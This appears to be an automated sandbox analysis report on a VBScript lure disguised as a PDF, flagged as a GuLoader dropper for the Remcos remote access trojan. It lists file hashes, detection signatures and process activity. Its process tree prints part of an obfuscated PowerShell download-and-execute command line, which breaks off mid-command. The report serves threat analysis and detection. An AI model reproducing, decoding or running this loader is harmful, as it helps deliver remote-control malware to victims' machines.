Windows
Analysis Report
Document BT24#U00b7pdf.vbs
Overview
General Information
Sample name: | Document BT24#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | Document BT24pdf.vbs |
Analysis ID: | 1634191 |
MD5: | ad3e6aca2d3c7bdc121064d393074f8b |
SHA1: | 8dca38f1576b98c17435bc1dd37ebf62108e77a8 |
SHA256: | 7bec21f0990dfc51766f7b7932aa1535aa0414e33abc021834158151ad15ed9d |
Tags: | RATRemcosRATvbsuser-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6420 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Docum ent BT24#U 00b7pdf.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) PING.EXE (PID: 5300 cmdline:
ping Host_ 6637.6637. 6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D) conhost.exe (PID: 2656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $els elskaber;f unction Xa nthorrhiza ($Diagnost ikkernes){ .($Optima lvaerdi) ( $Diagnosti kkernes)} function r aspite($Am bivalentes ){$smaabar nsalderen= 4;do{$Summ ker+=$Ambi valentes[$ smaabarnsa lderen];$s maabarnsal deren+=5;$ Skaberakta pirer=Form at-List} u ntil(!$Amb ivalentes[ $smaabarns alderen])$ Summker}$S paltedefin itionen=ra spite ' nd nHjlpeM th tThra.Lesi w';$Spalte definition en+=raspit e 'MasteB, reb Di CTe ralSl gIAs sieBeh,N i rT';$Chore men=raspit e 'ro fM F oroSa,izGa gsiMpanlUn c lAnt aDe me/';$Poly tungstate= raspite 'S aniTGogolS tifs Agu1 Afs2';$Hem atohidrosi s='Inve[No .nNSlutE R abt K l.An thSUnexE,e ssrQuinVMi lliTolacMi llEStraPTr idO PeriCo ntNOpsuT U dvMOm,iA s lNOrgaa B ,rgBeg,eSt emrKa,e]F, rf:Duch:H. poS HijePh ,ecUdfruSn ekRProtiIn coT.arayBu ckpFlotrSk y oVoltTKo goFor cTr iao ortlWa r =taag$St atP puno g riLNeu YEm peTGoo UOe c NSmregTi lls ShatSv daOvertPr ope';$Chor emen+=rasp ite 'Rets5 Lede.De i0 enc Doe(A ttaW AngiC ompn ynkdO p roV.trwF angs Spr S .riNDioxTf aca Misa1T ta0Cruc.D ile0Hjem;G enl UnpeWV ulgiNedknR adi6Tilb4B ybu;Sp l K igx nap6G raf4Mu t; Ndt FrorMo ntvSkib:T mm1Past3 D en4 trl.Un mo0Fal )A la ForsG K naeMigrcOo phkGer,oFj l./Ar.e2Un r 0 V n1Za ir0Peri0Sk ab1benz0Ph ys1Ran Pl eFClasi ms trFlaweSek sfuopdo al lxPala/du, n1 .nt3Hju l4Rall.Gib b0';$Gyldi gheder=ras pite 'Form uSociSPo a EKibbRInst -Hr,eANobi gExtrEFord nBi eT';$R eaccepted= raspite 'O pdrhPaaktU ordt E,cp ActsPort:B ,ro/Vldi/ la,dUdsor C.ciUdvivI ntae Sid.C ar g dskoR ag o Th gF eeblP eseU dpa.Outwc emeoSnnemB se/Omn,u ankc Unq?m uskeSignx I,rp ormoa rer Bo tK rn=.dspdH ensot,ylw DatnSavnlP olyoKonta. occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5S ho.AS ymsL odnIBathYS dceXTemae. abrKUndeOH airNTes 8 SniaAga z, fveVvend9U peDOlivtM ttsOv r0D omfsUndlJt ranh SpijH ypnUBo lxO rthJTappTL rlisterrm' ;$Genette= raspite 'L oph>';$Opt imalvaerdi =raspite ' ForuI D ne Chlox';$Tr afikkens=' Amfibietan ken';$Unph ilosophize 47='\Unapp lauding.Ov e';Xanthor rhiza (ras pite 'Stre $ fsGBombl em.go Kr,b ranaNdteL Kut :minyG stumRRatio BrevwKapaL Hp te ondD Diff9Af,j6 Myl=G.rt$ TilEsku.N Daugv C b: SomnaSlu p Commp ardd FlyABondt ediaSupe+ Exc$SammU StranInt,p NonpH DifI ponyL SupO Topus Proo rnepNonsH Sa tIDmpez VoliE chl4 Kerm7');Xa nthorrhiza (raspite 'udst$ Fje G,hriL Ing O AfsB Ost aRisplfrdi :BerbeShus r EctyDron tBimah Mes rGeneOSpat CMascYT av T ompe Vi SBrdd=,ors $ProbR For E Sala Und CBag CReve EAmorPHyst tautoETusc DSond.Solo sAllePRebo LGl sibakk TStik(Foot $ kidgBirt EAvilNClub e Spatrepa tRepuE Coq )');Xantho rrhiza (ra spite $Hem